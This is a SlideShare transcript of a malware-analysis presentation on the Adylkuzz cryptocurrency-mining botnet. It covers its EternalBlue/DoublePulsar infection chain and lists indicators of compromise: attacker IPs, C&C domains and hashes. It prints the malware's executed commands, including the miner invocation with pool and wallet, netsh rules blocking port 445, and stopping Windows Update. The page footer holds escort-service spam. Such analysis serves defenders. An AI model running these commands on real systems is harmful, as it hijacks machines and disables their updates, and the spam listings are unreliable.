SlideShare a Scribd company logo

Adylkuzz a Cryptocurrency-mining Botnet

Vishal Kumar
Vishal Kumar

This Document will provide you the knowledge and working flow of Adylkuzz Botnet. you will also learn the mitigation plans for this botnet.

Internet
1 of 9
Download to read offline
Adylkuzz is a cryptocurrency-mining botnet discovered by security firm Proofpoint in May 2017 as the company's analysts were attempting to conduct research on the WannaCry ransomware campaign. The analysts deliberately exposed a vulnerable system to the EternalBlue exploit in an attempt to infect it with a sample of the WannaCry ransomware variant. However, within 20 minutes of the exposure, the vulnerable system became infected with Adylkuzz. They determined that the botnet attack was launched from several virtual private servers tasked with scanning the internet for vulnerable systems that had TCP port 445 exposed. Once a vulnerable system was successfully exploited with EternalBlue, it is then infected with DoublePulsar, a kernel DLL injection technique that creates a backdoor. DoublePulsar then downloads Adylkuzz from an external host and runs it. Once launched, Adylkuzz will first terminate any instances of itself that are already running on the system and block SMB traffic preventing new infections, including those resulting from WannaCry. It then collects the public IP address of the victim and downloads the cryptocurrency mining software, mining instructions, and cleanup tools. Analysts determined that this attack was designed to mine Monero, a cryptocurrency that's touted as a more secure and anonymous alternative to Bitcoin. Working flow of Adylkuzz: DOUBLEPULSAR delivering Adylkuzz observed incoming connections listening port 445 from unfamiliar remote locations:
Incoming connections over SMB observed attempting to deliver DOUBLEPULSAR The payload delivering the crypto-currency botnet was executed immediately after the end of the incoming connection, which confirms the use of the DoublePulsar exploit. The exploit infects a legitimate Windows service and runs a downloader to fetch the payload. Below are details of the infected service, resolved DNS queries, and the connected IPs.
The above data shows that the DOUBLEPULSAR backdoor downloaded the Adylkuzz botnet, using svchost.exe (Diagnostic Tracking Service) directly from 45(.)77.41.231. While examining this IP address, we noticed that it is linked to ShadowBrokers / Equation payloads that were detected by multiple antivirus vendors. https://virustotal.com/en/ip-address/45.77.41.231/information/ https://virustotal.com/en/file/b704dd388be29de7a33e2a806dc1dfb391a8f 22f0b8f5f4c858f9fcf18455288/analysis/
The Adylkuzz botnet execution Once downloaded and installed by DOUBLEPULSAR, the Adylkuzz botnet runs as a service (sppsrv.exe) with SYSTEM privileges and takes the following actions:  Check internet connectivity using a known IP service  Communicate with Adylkuzz C&C server  Downloads the Monero cryptocurrency miner and additional tools Monero Crypto Currency Miner
lms.exe – c3fbd25209ca8aff4a50106226713afc3c970143 The lms.exe process is responsible for the Monero cryptocurrency mining, as can be seen in the command line: DNS requests made to the Monero mining pool server:
Adylkuzz executes additional tool and commands:
Adylkuzz will also download an additional tool (s9u8.1_.exe – e40811db66973dd7d2be2f5eb5d5f0ed824a1a3b) that runs a long series of commands. This includes commands that ensure that the malware won’t have any “competition” coming from potential additional infections originating from the same SMB exploit. This is done by creating a Windows firewall rule that blocks connections running on port 445 (default SMB port): Observed binary files Observed domains and IPs g.disgogoweb.com > 104.24.120.122 (Adylkuzz C&C server) xmr.crypto-pool.fr > 212.129.46.87 (Monero Crypto Pool Miner) icanhazip.com – checking internet connectivity and geo-location
Indicators of Compromise Selection of Domain/IP Address Date Comment 45.32.52[.]8 2017-05-16 Attacking host 45.76.123[.]172 2017-05-16 Attacking host 104.238.185[.]251 2017-05-16 Attacking host 45.77.57[.]194 2017-05-14 Attacking host 45.76.39[.]29 2017-05-15 Attacking host 45.77.57[.]36 2017-05-15 Attacking host 104.238.150[.]145 2017-05-14 Server hosting the payload binary 08.super5566[.]com 2017-05-14 Adylkuzz C&C a1.super5566[.]com 2017-05-02 Adylkuzz C&C aa1.super5566[.]com 2017-05-01 Adylkuzz C&C lll.super1024[.]com 2017-04-24 Adylkuzz C&C 07.super5566[.]com 2017-04-30 Adylkuzz C&C am.super1024[.]com 2017-04-25 Adylkuzz C&C 05.microsoftcloudserver[.]com 2017-05-12 Adylkuzz C&C d.disgogoweb[.]com 2017-04-30 Adylkuzz C&C panel.minecoins18[.]com 2014-10-17 Adylkuzz C&C in 2014 wa.ssr[.]la 2017-04-28 Adylkuzz C&C 45.77.57[.]190 2017-05-15 Host presenting same signature as attackers 45.77.58[.]10 2017-05-15 Host presenting same signature as attackers 45.77.58[.]40 2017-05-15 Host presenting same signature as attackers 45.77.58[.]70 2017-05-15 Host presenting same signature as attackers 45.77.56[.]87 2017-05-15 Host presenting same signature as attackers 45.77.21[.]159 2017-05-15 Attacking Host 45.77.29[.]51 2017-05-15 Host presenting same signature as attackers 45.77.31[.]219 2017-05-15 Host presenting same signature as attackers 45.77.5[.]176 2017-05-15 Host presenting same signature as attackers 45.77.23[.]225 2017-05-15 Host presenting same signature as attackers 45.77.58[.]147 2017-05-15 Host presenting same signature as attackers 45.77.56[.]114 2017-05-15 Host presenting same signature as attackers 45.77.3[.]179 2017-05-15 Host presenting same signature as attackers 45.77.58[.]134 2017-05-15 Host presenting same signature as attackers 45.77.59[.]27 2017-05-15 Host presenting same signature as attackers Hash Values SHA-256 Date Comment 29d6f9f06fa780b7a56cae0aa888961b8bdc559500421f3bb3b97f3dd94797c2 2017-05-14 Pcap of the attack (filtered and a bit sanitized) 8200755cbedd6f15eecd8207eba534709a01957b172d7a051b9cc4769ddbf2332017-05-14 Adylkuzz.B spread via EB/DP 450cb5593d2431d00455cabfecc4d28d42585789d84c25d25cdc5505189b4f9f 2017-04-24 Adylkuzz.A (we are not sure that instance was spread via EB/DP) a7000b2618512f1cb24b51f4ae2f34d332b746183dfad6483aba04571ba8b2f9 2017-05-14 s2bk.1_.exe e96681456d793368a6fccfa1321c10c593f3527d7cadb1ff462aa0359af61dee 2017-05-14 445.bat (? seems to cleanup old variant of the coin miner and stop windows Update) e6680bf0d3b32583047e9304d1703c87878c7c82910fbe05efc8519d2ca2df71 2017-05-14 Msiexev.exe Bitcoin miner process 55622d4a582ceed0d54b12eb40222bca9650cc67b39f74c5f4b78320a036af88 2017-05-02 Bitcoin miner process 6f74f7c01503913553b0a6118b0ea198c5a419be86fca4aaae275663806f68f3 2017-05-15 Adylkuzz.B spread via EB/DP fab31a2d44e38e733e1002286e5df164509afe18149a8a2f527ec6dc5e71cb00 2014-10-17 An old version of Adylkuzz d73c9230811f1075d5697679b6007f5c15a90177991e238c5adc3ed55ce049882017-05-15 Adylkuzz.B spread via EB/DP
Executed commands: taskkill /f /im hdmanager.exe C:Windowssystem32wbemwmiprvse.exe -secured -Embedding taskkill /f /im mmc.exe sc stop WELM sc delete WELM netsh ipsec static add policy name=netbc netsh ipsec static add filterlist name=block netsh ipsec static add filteraction name=block action=block netsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445 netsh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block netsh ipsec static set policy name=netbc assign=y C:WindowsFontswuauser.exe --server C:WindowsFontsmsiexev.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 49v1V2suGMS8JyPEU5FTtJRTHQ9YmraW7Mf2btVCTxZuEB8EjjqQz3i8vECu7XCgvUfiW6NtSRewn HF5MNA3LbQTBQV3v9i -p x -t 1 C:WindowsTEMPs2bk.1_.exe /stab C:WindowsTEMPs2bk.2_.log taskkill /f /im msiexev.exe netsh advfirewall firewall delete rule name="Chrome" netsh advfirewall firewall delete rule name="Windriver" netsh advfirewall firewall add rule name="Chrome" dir=in program="C:Program FilesGoogleChromeApplicationchrome.txt" action=allow netsh advfirewall firewall add rule name="Windriver" dir=in program="C:Program FilesHardware Driver Managementwindriver.exe" action=allow C:Windows445.bat C:Windowssystem32PING.EXE ping 127.0.0.1 net stop Windows32_Update attrib +s +a +r +h wuauser.exe C:Windowssystem32SecEdit.exe secedit /configure /db C:Windowsnetbios.sdb C:Windowssystem32net1 stop Windows32_Update

Recommended

Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
The Complete Questionnaires About Firewall
The Complete Questionnaires About FirewallThe Complete Questionnaires About Firewall
The Complete Questionnaires About FirewallVishal Kumar
 
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)Vishal Kumar
 
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) ProtocolE-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) ProtocolVishal Kumar
 
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using MetasploitPrivileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using MetasploitVishal Kumar
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionVishal Kumar
 
Auditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrackAuditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrackVishal Kumar
 
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsDumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsVishal Kumar
 

Recommended

Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
The Complete Questionnaires About Firewall
The Complete Questionnaires About FirewallThe Complete Questionnaires About Firewall
The Complete Questionnaires About FirewallVishal Kumar
 
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)Vishal Kumar
 
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) ProtocolE-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) ProtocolVishal Kumar
 
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using MetasploitPrivileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using MetasploitVishal Kumar
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionVishal Kumar
 
Auditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrackAuditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrackVishal Kumar
 
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsDumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsVishal Kumar
 
Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Vishal Kumar
 
The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)Vishal Kumar
 
Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1Vishal Kumar
 
The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)Vishal Kumar
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareVishal Kumar
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
Exploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web applicationExploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web applicationVishal Kumar
 
Mirroring web site using ht track
Mirroring web site using ht trackMirroring web site using ht track
Mirroring web site using ht trackVishal Kumar
 
Collecting email from the target domain using the harvester
Collecting email from the target domain using the harvesterCollecting email from the target domain using the harvester
Collecting email from the target domain using the harvesterVishal Kumar
 
Information gathering using windows command line utility
Information gathering using windows command line utilityInformation gathering using windows command line utility
Information gathering using windows command line utilityVishal Kumar
 
Introduction ethical hacking
Introduction ethical hackingIntroduction ethical hacking
Introduction ethical hackingVishal Kumar
 
Social engineering
Social engineeringSocial engineering
Social engineeringVishal Kumar
 
Social engineering
Social engineeringSocial engineering
Social engineeringVishal Kumar
 
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.CarlotaBedoya1
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceCall Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceCall Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...SofiyaSharma5
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 

More Related Content

More from Vishal Kumar

Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Vishal Kumar
 
The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)Vishal Kumar
 
Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1Vishal Kumar
 
The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)Vishal Kumar
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareVishal Kumar
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
Exploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web applicationExploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web applicationVishal Kumar
 
Mirroring web site using ht track
Mirroring web site using ht trackMirroring web site using ht track
Mirroring web site using ht trackVishal Kumar
 
Collecting email from the target domain using the harvester
Collecting email from the target domain using the harvesterCollecting email from the target domain using the harvester
Collecting email from the target domain using the harvesterVishal Kumar
 
Information gathering using windows command line utility
Information gathering using windows command line utilityInformation gathering using windows command line utility
Information gathering using windows command line utilityVishal Kumar
 
Introduction ethical hacking
Introduction ethical hackingIntroduction ethical hacking
Introduction ethical hackingVishal Kumar
 
Social engineering
Social engineeringSocial engineering
Social engineeringVishal Kumar
 
Social engineering
Social engineeringSocial engineering
Social engineeringVishal Kumar
 

More from Vishal Kumar (14)

Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2
 
The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)
 
Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1
 
The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft Maalware
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
 
Exploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web applicationExploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web application
 
Mirroring web site using ht track
Mirroring web site using ht trackMirroring web site using ht track
Mirroring web site using ht track
 
Collecting email from the target domain using the harvester
Collecting email from the target domain using the harvesterCollecting email from the target domain using the harvester
Collecting email from the target domain using the harvester
 
Information gathering using windows command line utility
Information gathering using windows command line utilityInformation gathering using windows command line utility
Information gathering using windows command line utility
 
Introduction ethical hacking
Introduction ethical hackingIntroduction ethical hacking
Introduction ethical hacking
 
Social engineering
Social engineeringSocial engineering
Social engineering
 
Social engineering
Social engineeringSocial engineering
Social engineering
 

Recently uploaded

INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.CarlotaBedoya1
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...SofiyaSharma5
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...Diya Sharma
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Delhi Call girls
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersDamian Radcliffe
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.soniya singh
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableSeo
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663Call Girls Mumbai
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024APNIC
 

Recently uploaded (20)

INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
 
